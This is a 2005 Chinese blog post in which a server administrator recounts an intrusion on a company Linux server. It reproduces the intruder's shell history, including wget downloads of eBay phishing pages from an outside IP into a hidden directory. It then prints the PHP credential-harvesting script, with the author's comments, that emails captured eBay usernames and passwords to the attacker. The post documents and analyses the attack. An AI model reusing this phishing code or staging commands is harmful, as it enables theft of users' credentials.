嘿嘿!
全部博文(140)
分类: 网络与安全
2005-11-28 11:19:04
从我公司的Linux服务器找到如下信息
cd ..
ls
mkdir " "
ls
ls -alF
cd " "
ls
mkdir ebay
ls
cde ebay
cd ebay
wget free-ftp.org/drx/ebay/index.html
wget 80.190.243.71/drx/ebay/index.html
wget 80.190.243.71/drx/index.html
wget 80.190.243.71/drx/contact.php
vim contact.php
早上上班的时候,发现服务器密码被改了。预感被入侵了
果然被入侵了。通过查找历史命令,找到一些蛛丝马迹
该入侵者无非就是想通过我的服务器做个Ebay的傀儡网站
在 /var/ww/html/建立了一个 " "的目录
然后把ebay的钓鱼网站指向我这这边的目录
等我到继续查的时候,发现这家伙已经抹去了痕迹,把目录给擦除了
呵呵
我查看了该contact.php,从php的分析看到如下内容。很有意思的脚本
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$userid = $_POST['userid']; 把用户名称记录下来
$pass = $_POST['pass']; 把密码记录下来
} else {
$userid = $_GET['userid'];
$pass = $_GET['pass'];
}
$myemail = ""; 自动发到这个鸟人的邮箱
$subject = "USER: $userid PASS: $pass eBay"; 把用户名称跟密码,好可爱!
$ipa = getenv('REMOTE_ADDR');
$dta = date("j.m.Y, G:ia", strtotime("+3 hours"));
$message = "
Ebay User Id: $userid
User Id Pass: $pass
Date/time: $dta
IP: $ipa
";
if($UserIDgol != $userid || $passgol != $pass) {
mail($myemail, $subject, $message);
header("Location: =
1&bshowgif=0&favoritenav=&ru=http%3A%2F%2Fcontact.ebay.com%3A80%2Fws%2FeBayISAPI.dll%3FReturnUserEmail%26contactsubmit%3DContact%2BM
ember%26MfcISAPICommand%3DReturnUserEmail%26frm%3D279%26iid%3D-1%26requested%3Dalimotawww%26redirect%3D0%26de%3Doff&pp=&errmsg=8");
}
?>
小伙子还是太嫩了。从/var/www/secure看到还是美国来的客人!下次搞个新的蜜罐服务器给他玩。
BTW:别下载下来干坏事哦!:P
